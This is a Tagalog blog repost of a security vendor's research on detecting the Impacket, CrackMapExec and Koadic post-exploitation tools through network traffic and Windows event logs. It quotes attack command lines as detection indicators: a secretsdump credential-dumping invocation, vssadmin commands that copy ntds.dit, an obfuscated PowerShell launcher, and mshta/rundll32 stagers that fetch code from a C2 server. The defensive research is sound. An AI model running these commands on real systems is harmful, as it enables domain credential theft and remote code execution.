ProHoster > Blog > Pangangasiwa > Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker

Ang bilang ng mga pag-atake sa sektor ng korporasyon ay lumalaki bawat taon: halimbawa noong 2017, 13% pang kakaibang insidente ang naitala kaysa sa 2016, at sa pagtatapos ng 2018 - 27% pang insidentekaysa sa nakaraang panahon. Kabilang ang mga kung saan ang pangunahing gumaganang tool ay ang Windows operating system. Noong 2017-2018, ang APT Dragonfly, APT28, APT MuddyWater nagsagawa ng mga pag-atake sa mga organisasyon ng gobyerno at militar sa Europe, North America at Saudi Arabia. At gumamit kami ng tatlong tool para dito - Impacket, CrackMapExec ΠΈ Koadic. Ang kanilang source code ay bukas at available sa GitHub.

Ito ay nagkakahalaga na tandaan na ang mga tool na ito ay hindi ginagamit para sa paunang pagtagos, ngunit upang bumuo ng isang pag-atake sa loob ng imprastraktura. Ginagamit ito ng mga umaatake sa iba't ibang yugto ng pag-atake kasunod ng pagpasok ng perimeter. Ito, sa pamamagitan ng paraan, ay mahirap na makita at madalas lamang sa tulong ng teknolohiya pagtukoy ng mga bakas ng kompromiso sa trapiko sa network o mga tool na nagpapahintulot tuklasin ang mga aktibong aksyon ng isang umaatake pagkatapos niyang makapasok sa imprastraktura. Ang mga tool ay nagbibigay ng iba't ibang mga function, mula sa paglilipat ng mga file hanggang sa pakikipag-ugnayan sa registry at pagpapatupad ng mga command sa isang remote na makina. Nagsagawa kami ng pag-aaral sa mga tool na ito upang matukoy ang kanilang aktibidad sa network.

Ano ang kailangan naming gawin:

  • Unawain kung paano gumagana ang mga tool sa pag-hack. Alamin kung ano ang kailangang pagsamantalahan ng mga umaatake at kung anong mga teknolohiya ang maaari nilang gamitin.
  • Hanapin kung ano ang hindi natukoy ng mga tool sa seguridad ng impormasyon sa mga unang yugto ng isang pag-atake. Ang yugto ng reconnaissance ay maaaring laktawan, alinman dahil ang umaatake ay isang panloob na umaatake, o dahil ang umaatake ay nagsasamantala ng isang butas sa imprastraktura na hindi pa kilala noon. Nagiging posible na ibalik ang buong kadena ng kanyang mga aksyon, kaya ang pagnanais na makita ang karagdagang paggalaw.
  • Tanggalin ang mga maling positibo mula sa mga tool sa pagtukoy ng panghihimasok. Hindi natin dapat kalimutan na kapag ang ilang mga aksyon ay nakita batay sa reconnaissance lamang, ang mga madalas na pagkakamali ay posible. Karaniwan sa imprastraktura ay may sapat na bilang ng mga paraan, na hindi makilala sa mga lehitimong sa unang tingin, upang makakuha ng anumang impormasyon.

Ano ang ibinibigay ng mga tool na ito sa mga umaatake? Kung ito ay Impacket, ang mga umaatake ay makakatanggap ng malaking library ng mga module na maaaring magamit sa iba't ibang yugto ng pag-atake na kasunod pagkatapos masira ang perimeter. Maraming mga tool ang gumagamit ng mga module ng Impacket sa loob - halimbawa, Metasploit. Mayroon itong dcomexec at wmiexec para sa remote na pagpapatupad ng command, secretsdump para sa pagkuha ng mga account mula sa memorya na idinagdag mula sa Impacket. Bilang resulta, ang tamang pagtuklas ng aktibidad ng naturang library ay titiyakin ang pagtuklas ng mga derivatives.

Hindi nagkataon lang na isinulat ng mga creator ang "Powered by Impacket" tungkol sa CrackMapExec (o simpleng CME). Bilang karagdagan, ang CME ay may nakahanda nang functionality para sa mga sikat na sitwasyon: Mimikatz para sa pagkuha ng mga password o kanilang mga hash, pagpapatupad ng Meterpreter o Empire agent para sa remote execution, at Bloodhound na nakasakay.

Ang pangatlong tool na pinili namin ay Koadic. Ito ay medyo kamakailan lamang, ipinakita ito sa internasyonal na kumperensya ng hacker na DEFCON 25 noong 2017 at nakikilala sa pamamagitan ng isang hindi pamantayang diskarte: gumagana ito sa pamamagitan ng HTTP, Java Script at Microsoft Visual Basic Script (VBS). Ang pamamaraang ito ay tinatawag na living off the land: ang tool ay gumagamit ng isang set ng mga dependency at mga library na binuo sa Windows. Tinatawag itong COM Command & Control ng mga tagalikha, o C3.

IMPACKET

Napakalawak ng functionality ng Impacket, mula sa reconnaissance sa loob ng AD at pagkolekta ng data mula sa mga internal na MS SQL server, hanggang sa mga diskarte sa pagkuha ng mga kredensyal: ito ay isang SMB relay attack, at pagkuha ng ntds.dit file na naglalaman ng mga hash ng mga password ng user mula sa isang domain controller. Ang Impacket ay nagpapatupad din ng mga command nang malayuan gamit ang apat na magkakaibang pamamaraan: WMI, Windows Scheduler Management Service, DCOM, at SMB, at nangangailangan ng mga kredensyal upang magawa ito.

Secretsdump

Tingnan natin ang secretsdump. Ito ay isang module na maaaring i-target ang parehong user machine at domain controllers. Maaari itong magamit upang makakuha ng mga kopya ng mga lugar ng memorya na LSA, SAM, SECURITY, NTDS.dit, upang makita ito sa iba't ibang yugto ng pag-atake. Ang unang hakbang sa pagpapatakbo ng module ay ang pagpapatunay sa pamamagitan ng SMB, na nangangailangan ng password ng user o ng hash nito upang awtomatikong maisagawa ang Pass the Hash attack. Susunod ay isang kahilingan upang buksan ang access sa Service Control Manager (SCM) at makakuha ng access sa registry sa pamamagitan ng winreg protocol, gamit kung saan ang isang attacker ay maaaring malaman ang data ng mga sangay ng interes at makakuha ng mga resulta sa pamamagitan ng SMB.

Sa Fig. 1 nakikita natin kung gaano eksakto kapag gumagamit ng winreg protocol, ang pag-access ay nakuha gamit ang isang registry key na may isang LSA. Upang gawin ito, gamitin ang utos ng DCERPC na may opcode 15 - OpenKey.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 1. Pagbubukas ng registry key gamit ang winreg protocol

Susunod, kapag nakuha ang access sa key, ang mga value ay nai-save gamit ang SaveKey command na may opcode 20. Ginagawa ito ng Impacket sa isang napaka-espesipikong paraan. Sine-save nito ang mga value sa isang file na ang pangalan ay isang string ng 8 random na character na nakadugtong ng .tmp. Bilang karagdagan, ang karagdagang pag-upload ng file na ito ay nangyayari sa pamamagitan ng SMB mula sa direktoryo ng System32 (Larawan 2).

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 2. Scheme para sa pagkuha ng registry key mula sa isang remote na makina

Lumalabas na ang naturang aktibidad sa network ay maaaring makita sa pamamagitan ng mga query sa ilang mga sangay ng pagpapatala gamit ang winreg protocol, mga partikular na pangalan, mga utos at kanilang pagkakasunud-sunod.

Ang module na ito ay nag-iiwan din ng mga bakas sa Windows event log, na ginagawang madali itong matukoy. Halimbawa, bilang resulta ng pagpapatupad ng utos

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Sa log ng Windows Server 2016 makikita natin ang sumusunod na pangunahing sequence ng mga kaganapan:

1. 4624 - malayuang Logon.
2. 5145 - pagsuri sa mga karapatan sa pag-access sa remote na serbisyo ng winreg.
3. 5145 - pagsuri sa mga karapatan sa pag-access ng file sa direktoryo ng System32. Ang file ay may random na pangalan na binanggit sa itaas.
4. 4688 - paglikha ng proseso ng cmd.exe na naglulunsad ng vssadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - paglikha ng isang proseso na may utos:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - paglikha ng isang proseso na may utos:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - paglikha ng isang proseso na may utos:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Tulad ng maraming mga tool sa post-exploitation, ang Impacket ay may mga module para sa malayuang pagpapatupad ng mga command. Magtutuon kami sa smbexec, na nagbibigay ng interactive na command shell sa isang malayuang makina. Ang module na ito ay nangangailangan din ng pagpapatunay sa pamamagitan ng SMB, alinman sa isang password o isang password hash. Sa Fig. Sa Figure 3 nakikita namin ang isang halimbawa kung paano gumagana ang naturang tool, sa kasong ito ito ay ang lokal na administrator console.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 3. Interactive smbexec console

Ang unang hakbang ng smbexec pagkatapos ng authentication ay buksan ang SCM gamit ang OpenSCManagerW command (15). Ang query ay kapansin-pansin: ang MachineName field ay DUMMY.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 4. Kahilingan na buksan ang Service Control Manager

Susunod, ang serbisyo ay nilikha gamit ang CreateServiceW command (12). Sa kaso ng smbexec, makikita natin ang parehong lohika ng pagbuo ng command sa bawat oras. Sa Fig. Ang 5 berde ay nagpapahiwatig ng hindi nababagong mga parameter ng command, ang dilaw ay nagpapahiwatig kung ano ang maaaring baguhin ng isang umaatake. Madaling makita na ang pangalan ng executable file, ang direktoryo nito at ang output file ay maaaring baguhin, ngunit ang iba ay mas mahirap baguhin nang hindi nakakagambala sa lohika ng Impacket module.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 5. Kahilingan na gumawa ng serbisyo gamit ang Service Control Manager

Nag-iiwan din ang Smbexec ng mga halatang bakas sa log ng kaganapan sa Windows. Sa log ng Windows Server 2016 para sa interactive na command shell na may ipconfig command, makikita natin ang sumusunod na key sequence ng mga kaganapan:

1. 4697 β€” pag-install ng serbisyo sa makina ng biktima:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - paglikha ng proseso ng cmd.exe na may mga argumento mula sa punto 1.
3. 5145 - pagsuri sa mga karapatan sa pag-access sa __output file sa C$ na direktoryo.
4. 4697 β€” pag-install ng serbisyo sa makina ng biktima.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - paglikha ng proseso ng cmd.exe na may mga argumento mula sa punto 4.
6. 5145 - pagsuri sa mga karapatan sa pag-access sa __output file sa C$ na direktoryo.

Ang Impacket ay ang batayan para sa pagbuo ng mga tool sa pag-atake. Sinusuportahan nito ang halos lahat ng mga protocol sa imprastraktura ng Windows at sa parehong oras ay may sariling mga tampok na katangian. Narito ang mga partikular na kahilingan sa winreg, at ang paggamit ng SCM API na may katangiang pagbuo ng command, at ang format ng pangalan ng file, at SMB share SYSTEM32.

CRACKMAPEXEC

Ang tool ng CME ay pangunahing idinisenyo upang i-automate ang mga nakagawiang pagkilos na kailangang gawin ng isang umaatake upang sumulong sa loob ng network. Pinapayagan ka nitong magtrabaho kasama ang kilalang ahente ng Empire at Meterpreter. Upang maisagawa ang mga utos nang patago, maaaring i-obfuscate ng CME ang mga ito. Gamit ang Bloodhound (isang hiwalay na tool sa reconnaissance), maaaring i-automate ng isang attacker ang paghahanap para sa isang aktibong session ng administrator ng domain.

Bloodhound

Ang Bloodhound, bilang isang standalone na tool, ay nagbibigay-daan para sa advanced na reconnaissance sa loob ng network. Nangongolekta ito ng data tungkol sa mga user, machine, grupo, session at ibinibigay bilang PowerShell script o binary file. Ang mga protocol na nakabatay sa LDAP o SMB ay ginagamit upang mangolekta ng impormasyon. Ang CME integration module ay nagbibigay-daan sa Bloodhound na ma-download sa makina ng biktima, patakbuhin at tanggapin ang nakolektang data pagkatapos ng pagpapatupad, at sa gayon ay awtomatiko ang mga aksyon sa system at hindi gaanong kapansin-pansin ang mga ito. Ipinapakita ng graphical shell ng Bloodhound ang nakolektang data sa anyo ng mga graph, na nagbibigay-daan sa iyong mahanap ang pinakamaikling landas mula sa makina ng umaatake patungo sa administrator ng domain.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 6. Bloodhound Interface

Upang tumakbo sa makina ng biktima, lumilikha ang module ng isang gawain gamit ang ATSVC at SMB. Ang ATSVC ay isang interface para sa pagtatrabaho sa Windows Task Scheduler. Ginagamit ng CME ang function na NetrJobAdd(1) nito upang lumikha ng mga gawain sa network. Ang isang halimbawa ng kung ano ang ipinadala ng CME module ay ipinapakita sa Fig. 7: Ito ay isang cmd.exe command call at obfuscated code sa anyo ng mga argumento sa XML na format.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
Fig.7. Paglikha ng gawain sa pamamagitan ng CME

Matapos maisumite ang gawain para sa pagpapatupad, ang makina ng biktima ay nagsimula mismo ng Bloodhound, at ito ay makikita sa trapiko. Ang module ay nailalarawan sa pamamagitan ng mga query sa LDAP upang makakuha ng mga karaniwang pangkat, isang listahan ng lahat ng machine at user sa domain, at makakuha ng impormasyon tungkol sa mga aktibong session ng user sa pamamagitan ng kahilingan sa SRVSVC NetSessEnum.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 8. Pagkuha ng listahan ng mga aktibong session sa pamamagitan ng SMB

Bilang karagdagan, ang paglulunsad ng Bloodhound sa makina ng biktima na may naka-enable na pag-audit ay sinamahan ng isang kaganapan na may ID 4688 (paggawa ng proseso) at ang pangalan ng proseso. Β«C:WindowsSystem32cmd.exeΒ». Ang kapansin-pansin dito ay ang mga argumento ng command line:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Ang enum_avproducts module ay napaka-interesante mula sa punto ng view ng functionality at pagpapatupad. Binibigyang-daan ka ng WMI na gamitin ang WQL query language upang kunin ang data mula sa iba't ibang mga bagay sa Windows, na mahalagang ginagamit ng CME module na ito. Bumubuo ito ng mga query sa mga klase ng AntiSpywareProduct at AntiМirusProduct tungkol sa mga tool sa proteksyon na naka-install sa makina ng biktima. Upang makuha ang kinakailangang data, kumokonekta ang module sa rootSecurityCenter2 namespace, pagkatapos ay bubuo ng WQL query at tumatanggap ng tugon. Sa Fig. Ipinapakita ng Figure 9 ang mga nilalaman ng naturang mga kahilingan at tugon. Sa aming halimbawa, natagpuan ang Windows Defender.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 9. Network activity ng enum_avproducts module

Kadalasan, ang WMI auditing (Trace WMI-Activity), kung saan ang mga kaganapan ay makakahanap ka ng kapaki-pakinabang na impormasyon tungkol sa mga query sa WQL, ay maaaring hindi paganahin. Ngunit kung ito ay pinagana, kung ang enum_avproducts script ay tatakbo, ang isang kaganapan na may ID 11 ay mase-save. Ito ay naglalaman ng pangalan ng user na nagpadala ng kahilingan at ang pangalan sa rootSecurityCenter2 namespace.

Ang bawat isa sa mga CME module ay may sariling artifact, maging partikular na mga query sa WQL o ang paglikha ng isang partikular na uri ng gawain sa isang task scheduler na may obfuscation at aktibidad na partikular sa Bloodhound sa LDAP at SMB.

KOADIC

Ang isang natatanging tampok ng Koadic ay ang paggamit ng mga interpreter ng JavaScript at VBScript na nakapaloob sa Windows. Sa ganitong kahulugan, sinusunod nito ang pamumuhay sa labas ng takbo ng lupa - iyon ay, wala itong mga panlabas na dependency at gumagamit ng mga karaniwang tool sa Windows. Ito ay isang tool para sa buong Command & Control (CnC), dahil pagkatapos ng impeksyon ay isang "implant" ang naka-install sa makina, na nagpapahintulot na ito ay makontrol. Ang ganitong makina, sa terminolohiya ng Koadic, ay tinatawag na "zombie." Kung walang sapat na mga pribilehiyo para sa buong operasyon sa panig ng biktima, may kakayahan ang Koadic na itaas ang mga ito gamit ang mga diskarte sa User Account Control bypass (UAC bypass).

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 10. Koadic Shell

Ang biktima ay dapat magsimula ng komunikasyon sa Command & Control server. Para magawa ito, kailangan niyang makipag-ugnayan sa isang naunang inihandang URI at tanggapin ang pangunahing Koadic body gamit ang isa sa mga stager. Sa Fig. Ang Figure 11 ay nagpapakita ng isang halimbawa para sa mshta stager.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 11. Pagsisimula ng session sa CnC server

Batay sa variable na tugon na WS, nagiging malinaw na ang pagpapatupad ay nangyayari sa pamamagitan ng WScript.Shell, at ang mga variable na STGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ay naglalaman ng pangunahing impormasyon tungkol sa mga parameter ng kasalukuyang session. Ito ang unang pares ng kahilingan-tugon sa isang HTTP na koneksyon sa isang CnC server. Ang mga kasunod na kahilingan ay direktang nauugnay sa pag-andar ng tinatawag na mga module (implants). Ang lahat ng mga module ng Koadic ay gumagana lamang sa isang aktibong session sa CnC.

Mimikatz

Tulad ng pakikipagtulungan ng CME sa Bloodhound, gumagana ang Koadic sa Mimikatz bilang isang hiwalay na programa at maraming paraan upang ilunsad ito. Nasa ibaba ang isang pares ng kahilingan-tugon para sa pag-download ng Mimikatz implant.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 12. Ilipat si Mimikatz sa Koadic

Makikita mo kung paano nagbago ang format ng URI sa kahilingan. Naglalaman na ito ng value para sa csrf variable, na responsable para sa napiling module. Huwag pansinin ang kanyang pangalan; Alam nating lahat na ang CSRF ay karaniwang naiintindihan nang iba. Ang tugon ay ang parehong pangunahing katawan ng Koadic, kung saan idinagdag ang code na nauugnay sa Mimikatz. Ito ay medyo malaki, kaya tingnan natin ang mga pangunahing punto. Narito mayroon kaming Mimikatz library na naka-encode sa base64, isang serialized na .NET class na mag-inject nito, at mga argumento para ilunsad ang Mimikatz. Ang resulta ng pagpapatupad ay ipinadala sa network sa malinaw na teksto.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 13. Resulta ng pagpapatakbo ng Mimikatz sa isang remote na makina

Exec_cmd

Ang Koadic ay mayroon ding mga module na maaaring magsagawa ng mga utos nang malayuan. Dito makikita natin ang parehong paraan ng pagbuo ng URI at ang pamilyar na mga variable ng sid at csrf. Sa kaso ng exec_cmd module, idinaragdag ang code sa katawan na may kakayahang magsagawa ng mga utos ng shell. Sa ibaba ay ipinapakita ang naturang code na nilalaman sa tugon ng HTTP ng server ng CnC.

Paano matukoy ang mga pag-atake sa imprastraktura ng Windows: paggalugad ng mga tool ng hacker
kanin. 14. Implant code exec_cmd

Ang GAWTUUGCFI variable na may pamilyar na WS attribute ay kinakailangan para sa code execution. Sa tulong nito, tinawag ng implant ang shell, pinoproseso ang dalawang sangay ng code - shell.exec sa pagbabalik ng stream ng output ng data at shell.run nang hindi bumabalik.

Ang Koadic ay hindi isang tipikal na tool, ngunit mayroon itong sariling mga artifact kung saan makikita ito sa lehitimong trapiko:

  • espesyal na pagbuo ng mga kahilingan sa HTTP,
  • gamit ang winHttpRequests API,
  • paglikha ng WScript.Shell object sa pamamagitan ng ActiveXObject,
  • malaking executable body.

Ang paunang koneksyon ay pinasimulan ng stager, kaya posibleng makita ang aktibidad nito sa pamamagitan ng mga kaganapan sa Windows. Para sa mshta, ito ay kaganapan 4688, na nagpapahiwatig ng paglikha ng isang proseso na may katangian ng pagsisimula:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Habang tumatakbo ang Koadic, maaari mong makita ang iba pang 4688 na kaganapan na may mga katangian na perpektong katangian nito:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Natuklasan

Ang pamumuhay mula sa kalakaran sa lupa ay nagiging popular sa mga kriminal. Ginagamit nila ang mga tool at mekanismong nakapaloob sa Windows para sa kanilang mga pangangailangan. Nakikita namin ang mga sikat na tool na Koadic, CrackMapExec at Impacket na sumusunod sa prinsipyong ito na lalong lumalabas sa mga ulat ng APT. Ang bilang ng mga tinidor sa GitHub para sa mga tool na ito ay lumalaki din, at may mga lumalabas na mga bago (mayroon nang halos isang libo sa kanila ngayon). Ang trend ay nagiging popular dahil sa pagiging simple nito: ang mga umaatake ay hindi nangangailangan ng mga tool ng third-party; nasa mga makina na sila ng mga biktima at tinutulungan silang lampasan ang mga hakbang sa seguridad. Nakatuon kami sa pag-aaral ng komunikasyon sa network: ang bawat tool na inilarawan sa itaas ay nag-iiwan ng sarili nitong mga bakas sa trapiko sa network; ang detalyadong pag-aaral ng mga ito ay nagbigay-daan sa amin na ituro ang aming produkto Pagtuklas ng Pag-atake sa Network ng PT tuklasin ang mga ito, na sa huli ay nakakatulong upang siyasatin ang buong hanay ng mga insidente sa cyber na kinasasangkutan nila.

Mga May-akda:

  • Anton Tyurin, Pinuno ng Departamento ng Mga Serbisyong Eksperto, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, eksperto, PT Expert Security Center, Positive Technologies

Pinagmulan: www.habr.com

Magdagdag ng komento